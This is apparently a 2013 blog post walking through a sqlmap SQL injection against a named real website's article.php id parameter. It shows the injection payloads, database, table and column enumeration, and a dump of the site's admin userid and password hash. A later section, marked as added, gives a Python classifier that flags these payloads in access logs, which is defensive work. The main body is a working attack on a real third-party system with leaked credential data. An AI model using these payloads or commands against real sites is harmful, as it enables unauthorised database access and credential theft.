sqlmap example: injecting into MySQL

Posted on 2013-4-4 22:18:49

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:53:54
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:53:54] [INFO] resuming injection data from session file
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:53:54] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:53:55] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:53:55] [INFO] fetching current user
    current user:    'root@localhost'
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:53:58

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:54:16
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:54:16] [INFO] resuming injection data from session file
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:54:16] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:54:17] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:54:17] [INFO] fetching current database
    current database:    'wepost'
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:54:18

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:55:25
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:55:25] [INFO] resuming injection data from session file
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:55:25] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:55:26] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:55:26] [INFO] fetching tables for database 'wepost'
    [16:55:27] [INFO] the SQL query used returns 6 entries
    Database: wepost
    [6 tables]
    +-------------+
    | admin       |
    | article     |
    | contributor |
    | idea        |
    | image       |
    | issue       |
    +-------------+
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:55:33

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:56:06
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
    Database: wepost
    Table: admin
    [4 columns]
    +----------+-------------+
    | Column   | Type        |
    +----------+-------------+
    | id       | int(11)     |
    | password | varchar(32) |
    | type     | varchar(10) |
    | userid   | varchar(20) |
    +----------+-------------+
    [*] shutting down at: 16:56:19

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of the columns
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:57:14
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    do you want to use common password suffixes? (slow!) [y/N] y
    Database: wepost
    Table: admin
    [1 entry]
    +----------------------------------+------------+
    | password                         | userid     |
    +----------------------------------+------------+
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    +----------------------------------+------------+
    [*] shutting down at: 16:58:14

    D:\Python27\sqlmap>
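
A defender's view of the session above, as an added example that is not part of the original post: a classifier that flags, in web-server access logs, the four payload types sqlmap lists for the `id` parameter. The combined log format, the sample lines, the client address 192.0.2.10 and the User-Agent check are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per technique type listed in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\).*GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}
# Request line and trailing User-Agent field of a combined-format log line.
LINE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+".*"(?P<ua>[^"]*)"$')

def classify(log_line):
    """Return the sorted list of findings for one access-log line."""
    m = LINE.search(log_line)
    if not m:
        return []
    findings = set()
    # Assumption: the tool's default User-Agent starts with "sqlmap/".
    # It is easily changed by the client, so treat it as a weak signal only.
    if m.group("ua").lower().startswith("sqlmap/"):
        findings.add("sqlmap user-agent")
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    query = urlsplit(m.group("url")).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for label, rx in SIGNATURES.items():
            if rx.search(value):
                findings.add(label)
    return sorted(findings)

def _line(query, ua="Mozilla/5.0"):
    """Build one constructed sample line (not taken from a real log)."""
    return ('192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] '
            f'"GET /article.php?{query} HTTP/1.1" 200 512 "-" "{ua}"')

SAMPLE = [
    _line("id=276"),
    _line("id=276%20AND%20799%3D799", ua="sqlmap/0.9"),
    _line("id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58),"
          "FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)"),
    _line("id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL%23"),
    _line("id=276%20AND%20SLEEP(5)"),
]

if __name__ == "__main__":
    for sample in SAMPLE:
        print(classify(sample))
```
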